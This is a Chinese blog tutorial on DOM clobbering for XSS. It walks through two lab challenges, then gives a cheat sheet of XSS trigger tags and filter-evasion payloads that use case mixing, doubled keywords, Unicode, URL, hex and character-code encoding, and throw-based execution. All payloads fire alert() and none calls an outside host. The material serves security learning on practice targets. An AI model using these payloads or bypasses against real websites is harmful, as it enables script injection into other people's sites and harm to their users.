xss之DOM破坏

已于 2024-08-18 14:41:28 修改
阅读量349 收藏 8
点赞数 4
文章标签: xss
于 2024-08-17 21:41:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72286569/article/details/141285910
版权

文章目录

DOM破坏

DOM破坏就是⼀种将 HTML 代码注⼊⻚⾯中以操纵 DOM 并最终更改⻚⾯上 JavaScript ⾏为的技术。 在⽆法直接 XSS的情况下,我们就可以往这⽅向考虑。

漏洞的复现

https://xss.pwnfunction.com/

在这里插入图片描述
GET参数boomer被设置为boomer.innerHTML,通过get参数将内容写入h2标签内,而且有过滤框架DOMPurify

setTimeout可以接受函数或字符串作为参数并执行它。在这里,ok变量被执行,但它不存在。

这里的JS代码是没有任何关于ok参数的定义的,所以我们可以使用DOM破坏,通过DOM破坏,将HTML元素注入到DOM中。

创建JavaScript变量构造ok参数,因为setTimeout函数执行字符串,所以需要用到或者标签
构造pyload

<a id=ok href="tel:alert(1)">a

基于bp学院DOM破坏漏洞复现

在这里插入图片描述

思路分析

在这里插入图片描述
分析代码可以看到可以用DOM破坏来控制window.defaultAvatar ,前提是我们原来没有头像然后就可以可以⽤⼀个构造⼀个defaultAvatar.avatar 来进行xss攻击。
我们来举个例子

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="1:&quot;οnerrοr=alert(1)//">

在这里插入图片描述
当输出 console.log(defaultAvatar)发现是一个数组,那就简单了,我们直接输出 console.log(defaultAvatar.avatar)发现输出的是a标签里面得内容。
在这里插入图片描述
我们在用alert方法打印一下defaultAvatar.avatar发现进行了弹窗,说明将href中的数据拿了出来。
在这里插入图片描述

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;οnerrοr=alert(1)//">

我们再来分析一下这段代码
当我们看源码的时候发现src需要用双引号来进行闭合,但是注意一点的是"必须要用html的实体编码。当执行之后&quot就会被解析成了"实现了闭合。
为什么用cid这个伪协议呢,我们来举个例子
在这里插入图片描述
在这里插入图片描述
我们发现弹出了整个的url地址,因为是url地址所以&quot被解析成了%22
当我们用一个从来没有的协议
在这里插入图片描述

在这里插入图片描述
我们发现弹出的仅仅是href里面得内容,并且&quot也成功的解析成了"

实现

我们随便打开一个评论进行评论
在这里插入图片描述

提交之后再随便的评论一下发现触发了弹窗。
在这里插入图片描述

常见的xss触发的标签

没有过滤的情况

//<script>
<scirpt>alert("xss");</script>
//img
图片加载错误时触发
<img src="x" onerror=alert(1)>
<img src="1" onerror=eval("alert('xss')")>
鼠标指针移动到元素时触发
<img src=1 onmouseover="alert(1)">
鼠标指针移出时触发
<img src=1 onmouseout="alert(1)">
//<a>
<a href=javascript:alert('xss')>test</a>
<a href="" onclick=alert('xss')>a</a>
<a href="" onclick=eval(alert('xss'))>aa</a>
//<input>
<input onfocus="alert('xss');">
竞争焦点,从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');" autofocus>
//<svg>
<svg onload=alert(1)>
//javascript伪协议
<a>标签
<a href="javascript:alert('xss');">xss</a>
<iframe>标签
<iframe src=javascript:alert('xss');></iframe>
<img>标签
<img src=javascript:alert('xss')>//IE7以下
<form>标签
<form action="Javascript:alert(1)"><input type=submit>

存在过滤的情况

//过滤空格
用 / 代替空格
<img/src="x"/onerror=alert("xss");>
//过滤关键字
大小写绕过
<ImG sRc=x onerRor=alert("xss");>
双写关键字(有些waf可能会只替换一次且是替换为空,这种情况下我们可以考虑双写关键字绕过)
<imimgg srsrcc=x onerror=alert("xss");>
字符拼接(利用eval)
<img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">
//编码绕过
Unicode编码绕过
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
url编码绕过
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Ascii码绕过
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
Hex绕过
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
//过滤双引号,单引号
如果是html标签中,我们可以不用引号;如果是在js中,我们可以用反引号代替单双引号
<img src="x" onerror=alert(``xss``);>
//过滤括号
当括号被过滤的时候可以使用throw来绕过
<svg/onload="window.οnerrοr=eval;throw'=alert\x281\x29';">
勤劳的鼹鼠
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss防御之php利用httponly防xss攻击
10-26
XSS的危害极大,可以分为存储型XSS攻击、反射型XSS攻击和DOMXSS攻击。 为防御XSS攻击,开发者通常会采取各种安全措施,其中使用HttpOnly属性是一种有效手段。HttpOnly是一个安全机制,可以用来防止跨站脚本攻击...
8、XSS 攻击的防御pdf资料
10-15
DOMXSS的特殊之处在于,攻击的payload可能隐藏在看似无害的属性中,如`document.referer`、`location`或`innerHTML`。攻击者可以利用这些属性在用户交互(如点击按钮)时触发攻击。 为了防御XSS攻击,开发者需要...
XSSDOM破坏
m0_67441173的博客
08-17 678
@keyframes x{}
XSSDOM破坏案例
weixin_67019439的博客
08-17 554
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,可以使用onfocus和autofucus。url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码。所以我们这里只能换一种思路,它不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。
XSS---DOM破坏
zhoutong2323的博客
05-24 361
在HTML中,如果使用一些特定的属性名(如id或name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。这种行为虽然有时可以方便地访问元素,但也会引发一些潜在的问题,特别是在元素的属性名与JavaScript全局对象的属性名冲突时,可能会破坏正常的DOM操作或脚本运行。这种现象被称为DOM破坏
XSS DOM破坏实战案例
qq_63034068的博客
08-17 588
他这里会写进一个img后面是如果我们有头像就用我们的如果没有他就用默认的然后会走进defaultAvatar.avatar,如果我们能够走到window.defaultAvatar,就可能闭合我们的src,那么我们就得想如何创造它。用我们之前的payload会被编码导致失败,我们需要将1:"换成一个不存再的协议,否侧会被当作url地址栏会将它进行编码成%22导致我们无法进入到后面的语句,这里我换成的是cid。这种黑名单里面的函数和嵌套都会被过滤掉,如果是白名单里面的但属性不是里面的也会被过滤掉。
论文研究-一种基于DOM随机性的XSS漏洞动态检测方法 .pdf
08-15
XSS漏洞,全称跨站脚本攻击(Cross-Site Scripting),是一种常见的网络攻击手段,攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时执行这些脚本,从而盗取用户信息或对网站进行破坏。由于其威胁性较大,...
XSS防攻击实现
05-09
XSS(Cross Site Scripting)攻击是网络安全领域中常见的攻击方式之一,攻击者通过注入恶意脚本,使得用户在访问网站时执行这些脚本,从而窃取用户信息或破坏网站功能。防止XSS攻击是保障Web应用安全的重要环节。...
防止XSS攻击教程
06-03
- DOMXSS:恶意脚本不经过服务器处理,而是通过修改页面的DOM(文档对象模型)直接在用户浏览器中执行。 2. **输入验证与过滤**: - 对用户提交的数据进行严格的验证,限制允许的字符集和格式,避免特殊字符的...
XSS盲打与cookie劫持
m0_74249600的博客
08-14 902
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
xss.function靶场(hard)
最新发布
丁航航的博客
08-18 271
目前啥也不输入,直接进入查看。
xss GAME (xss漏洞攻击1-8)
weixin_65785894的博客
08-18 560
构建一个ALERT(1337) source 是获取函数原码 toLowerCase() 获取小写。,原型为parseInt ( String s , [ int radix ] ),用于解析一个。alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F。分析:innerText=ma 这个代码 将会把你输入的都将转换为文本。就是修改他原来的参数,进行覆盖,最后误以为是正确的。而且有需求,不能有用户参与,而且必须弹窗1337。分析源码可知,没有任何过滤,那直接动手操作即可。
xss.pwnfunction-Easy
banliyaoguai的博客
08-17 510
然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串。然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下。我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()它匹配字符串 "ALERT(1337)"。
XSS DOM漏洞复现 与DOM 破坏
iteuko的博客
08-17 412
此关过滤了字母数字,所以只能用编码去解决,去JSFUCK上面把alert(1337)编码,然后再编码成url编码格式 放入即可。第二种parseint 解析一个字符串并返回指定基数的十进制整数,radic是2-36之间的整数,表示被解析字符串的基数。指针的原理,删完一个,指针会后移动,所以删除1,3,5的位置 ,2,4位置保留,那么把payload写到2,4,位置即可。CSS动画,下面的el删除的是后面的input的内容,已经通过它们占了。获取到ok,会自动用tostring方法,获取href属性。
XSS Game练习
Pu5073的博客
08-17 552
1.Ma Spaghet 直接get传参 ?somebody=aaaa 直接使用img标签 ?somebody=<img%20src=1%20onerror="alert(1337)"> 官方文档 应使用innertext,安全性更高 2.Jefff 通过代码可以知道是通过eval的代码执行,setTimeout中的内容表示在一秒后执行一次 危险方法为eval,用双引号闭合即可 ?jeff=";alert(1337);" or ?jeff=";-alert(1337);-" 3
XSS实验记录
qq_58742048的博客
08-17 802
这里的代码使用get传参的方式,给jeff一个值,将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,同时ma还带了一个ineerText的属性。因为过滤掉了(),所以script无法使用,这里使用img的报错实现,因为括号被过滤,使用实体编码进行绕过。在定时器里有一个submmit这个提交事件,获取了from表单的id,在两秒钟进行action的自动提交,而这个action是他接受的一个伪协议。或是使用eval函数来进行转写。
XSSxss game
qq_68600196的博客
08-18 862
至此,xss game的Warmups部分已结束!
XSS DOM型靶场复现(1-8关)
Sesessep的博客
08-18 381
2.最好把innerHTML替换成有相同效果的innerText,以第一关为例,将innerHTML替换成innerText后,直接将语句当作字符串输出,所有innerText的安全系数要比innerHTML要高。可以利用location加javascript伪协议,将“符号”、“变量名”、“函数名”统统变成“字符串”,在字符串中我们可以使用所有js里可以使用的编码,去构造payload。这句的意思是获取这个url中的get参数,如果有就设置h2的值为get传参的值,如果没有就设置h2的值为“JEFFF”
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值